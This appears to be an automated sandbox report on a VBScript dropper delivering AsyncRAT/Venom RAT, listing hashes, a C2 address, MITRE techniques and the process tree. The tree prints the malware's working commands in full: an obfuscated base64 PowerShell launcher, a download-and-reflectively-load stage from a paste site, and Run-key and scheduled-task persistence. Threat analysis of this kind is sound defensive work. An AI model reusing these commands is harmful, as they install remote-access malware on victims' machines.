asyncrat | 17dd3793d4bbf9e90e53df26678489a7b82e65d1eeecf396eb088b444a164f85

Analysis

max time kernel
131s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 17:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

COTIZACIÓN.vbs
Size

8.5MB
MD5

804513fa0ce051329e04056cdcd334bf
SHA1

107e788694216d64c5c02990f035f1d1acb60cf9
SHA256

17dd3793d4bbf9e90e53df26678489a7b82e65d1eeecf396eb088b444a164f85
SHA512

83aa0132a7fb8f2029c84fd329a2ff9179e646048e8a5997b1978dec2f29583c5f23808f6eb22be618744d21cd5d5f589f30d4e47d302484597ca960f2379f16
SSDEEP

192:DloyjjdVMFZNkNls2vv8hAwxJV837YTUf:lxO7k0hAwHVk

Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	5156	powershell.exe
26	5156	powershell.exe
35	5436	powershell.exe
36	5436	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3008	powershell.exe
5436	powershell.exe
3208	powershell.exe
5212	powershell.exe
4128	powershell.exe
5156	powershell.exe
2700	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
764	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5436 set thread context of 2028	5436	powershell.exe	114

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3600	schtasks.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
4128	powershell.exe
4128	powershell.exe
5156	powershell.exe
5156	powershell.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
5360	powershell.exe
5360	powershell.exe
2700	powershell.exe
2700	powershell.exe
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe
5360	powershell.exe
2700	powershell.exe
2700	powershell.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
3208	powershell.exe
3208	powershell.exe
3208	powershell.exe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe
2028	MSBuild.exe
2028	MSBuild.exe
2028	MSBuild.exe
2028	MSBuild.exe
2028	MSBuild.exe
2028	MSBuild.exe
2028	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	5156	powershell.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeDebugPrivilege	5360	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3208	powershell.exe
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeDebugPrivilege	2028	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2028	MSBuild.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2012 wrote to memory of 5648	2012	WScript.exe	86
PID 2012 wrote to memory of 5648	2012	WScript.exe	86
PID 2012 wrote to memory of 3600	2012	WScript.exe	88
PID 2012 wrote to memory of 3600	2012	WScript.exe	88
PID 2012 wrote to memory of 4128	2012	WScript.exe	90
PID 2012 wrote to memory of 4128	2012	WScript.exe	90
PID 4128 wrote to memory of 5156	4128	powershell.exe	92
PID 4128 wrote to memory of 5156	4128	powershell.exe	92
PID 5156 wrote to memory of 5436	5156	powershell.exe	98
PID 5156 wrote to memory of 5436	5156	powershell.exe	98
PID 5436 wrote to memory of 2700	5436	powershell.exe	99
PID 5436 wrote to memory of 2700	5436	powershell.exe	99
PID 5436 wrote to memory of 5360	5436	powershell.exe	100
PID 5436 wrote to memory of 5360	5436	powershell.exe	100
PID 5436 wrote to memory of 4908	5436	powershell.exe	101
PID 5436 wrote to memory of 4908	5436	powershell.exe	101
PID 2700 wrote to memory of 3008	2700	powershell.exe	102
PID 2700 wrote to memory of 3008	2700	powershell.exe	102
PID 764 wrote to memory of 3208	764	cmd.exe	107
PID 764 wrote to memory of 3208	764	cmd.exe	107
PID 3208 wrote to memory of 5752	3208	powershell.exe	108
PID 3208 wrote to memory of 5752	3208	powershell.exe	108
PID 5752 wrote to memory of 5212	5752	WScript.exe	109
PID 5752 wrote to memory of 5212	5752	WScript.exe	109
PID 5212 wrote to memory of 2812	5212	powershell.exe	111
PID 5212 wrote to memory of 2812	5212	powershell.exe	111
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114
PID 5436 wrote to memory of 2028	5436	powershell.exe	114

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
  2⤵
  PID:5648
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★MQBC★Fc★d★BY★DM★dg★1★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/1BWtX3v5/r/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5436
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3208
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N.vbs'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5212
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N.vbs
        5⤵
        
        PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
64da6f6e74475dde89a82d49cec8b985

SHA1
66c50d188a908c755f601c6da364581471d9c1de

SHA256
0eca2fba9dacd015e8bc12037a68a4f4fd445dd649ebbd5d70c4b82694b62d5d

SHA512
ad31993eb2f5c4f3db15d47aea53e7b78c42fb5ecf6f5b4b7b3b52c4af7dbf29fc5fde982bb561e8908621d80e291e200103e97c0ab14ac610f32bbe8cd11d0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4dbc7582ad15738f34d0c7994c5eada8

SHA1
df3c2bb3adeb7f83e2188e3689da95c8bf20ae80

SHA256
e26a96cbe475257de435cb8537a8fb9d1dcf07ad4ca20704b4eaab7cf7cf3dc3

SHA512
264c4e44c245d177b035d5d862f8689c9728629d2d361ecfa1b7c53b6a9678c82d172e08a7315db94d458e9b310e63c347515bffd4b0d6090206d1f6de2bcdba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ae0e3d19da4ba2342b179df9834ab6cd

SHA1
eb77c6b6e10de28154ab790d326875bbe12bfb95

SHA256
a1dba1268987cb72b3305951f0ce8bab715ef38f6fe368f5d0ccf46530283f9b

SHA512
d80c6535ee680f5397a57476fbea43faf03dd757e3130c65d1d67c086c86395c516314ec0e136ad67083ae2d47a6a32e446ce40a12d4ecdfe797e0d8bb083d98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f90a0d897a29ff0d6574a7bb459be03

SHA1
84fbb0f8482e285672d6836f01a8e5f83c000a52

SHA256
61c2fc859f62ddc8a2f3f18f3adb28533a285278672fffb6643ebbfb5bd858f6

SHA512
5330dbd3e6d4d2e96bd12024940e45b9e7e46f307194029aaa29ac56f4c28d61c5e937b2bd1e4adb7a4905cd1080d7ecba0f115851a09a30bbd91545a8f8b3b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1ddc2453ef75fa5c9c28e192482a67a4

SHA1
2fd8d9f7f336e5b5d81608f4934858e1bfdbbcd6

SHA256
e6192134beb09f65c916641c4aab6d3de82f5775726a1014f8a8675f459ca282

SHA512
bcabc4b09ce3c4aa8d07f151547a1cb0e3d843d76b7e348a6049ede8100cdfa1f72ab88f443abb34213acc8eba95d4df0ff67539e5e75adbe3b69cdb255c8480

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lnc3maar.fom.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
34B

MD5
551de3894acfc565eaf2ea5fd7a7760a

SHA1
39a4d83c3d551deca48be49fda4a2d1824c084b8

SHA256
ff53ba58dd8ec7f149bd3aa6c14b60baf059d46cc0b312f234858710f6c3635f

SHA512
5545f75a3c632756807a6dbeec49af2f645ae295d27f0df0c4205b505baadf8d5b5057a0fb95a6edc79bbd2c561e619c8c3e2c707d09b8354285c9ef735f3e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
300KB

MD5
1ed4ff6b14c799919ea5baaa9a01134d

SHA1
8d498985e857c1ec16c9f0b05cae4d684fb145da

SHA256
6d7cfe7ef865d8a7f4cee574736cf8ccf1b5dcba1c3c3b48a50498038921b384

SHA512
2ae2eab2f09e7499a8e078e35765868d5d8ca77e59ecb97c46700f7d2c4d324f438b63a81084de5ec484efa9383775688726136a8a02c82b0c0d9c1852ae5c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
970B

MD5
2e288e3b48c2a41df1d52d396de6f6a5

SHA1
5fb42a3c1abf2edfc6c2efc640df6d4fc5adf829

SHA256
0b5208092b1760d624bd37dfcb909c747093d5ae030759b769b620627c505101

SHA512
972c238360b71f34cf08f33359319bd56a4e9b45917d20c10cc0c042930de1149ce055707caeaa8d034e8bf4eb8df4650c4fb1292235c55a8a3de1df43be11fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
282B

MD5
b094f227c79abfc0903a9b305203075a

SHA1
fd0fc367d2ef0027cf935264da182389db464e5b

SHA256
0c3a5a7559e7c46a0769022433588e0db2fa750d2c871c6909332a6719f61833

SHA512
5a4202474e5f71318d95717ed4fc6887e3c5aff0aa98c951a426ad12a8a842add837b52ee99bef93f8a37a7b741c00a8e6f3979d76be4c2a92dbefb95631e129

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
194B

MD5
063ec3a94ad5f642af848d2f1528c164

SHA1
aae2d96ecff6c2edcbfccae2b412f3f1bf96f595

SHA256
530a5b5ab1acee6d8ab5deb4f97cc4b55531afdb2e3c3d5fe97416fb84284a16

SHA512
62e4942685700dba3e5293f19174ecbc15c5272608d5f23a9c95a577fb100d0e1eb4baf0a9831d9260bcd884f4c9725e81f101cfccddafb7111e602db1197362

Download Submit
memory/2028-114-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2028-122-0x0000000005420000-0x00000000059C4000-memory.dmp

Filesize
5.6MB

Download
memory/2028-124-0x0000000005290000-0x0000000005322000-memory.dmp

Filesize
584KB

Download
memory/2028-125-0x0000000005250000-0x000000000525A000-memory.dmp

Filesize
40KB

Download
memory/4128-1-0x00007FF80D4A3000-0x00007FF80D4A5000-memory.dmp

Filesize
8KB

Download
memory/4128-13-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

Filesize
10.8MB

Download
memory/4128-12-0x00007FF80D4A0000-0x00007FF80DF61000-memory.dmp

Filesize
10.8MB

Download
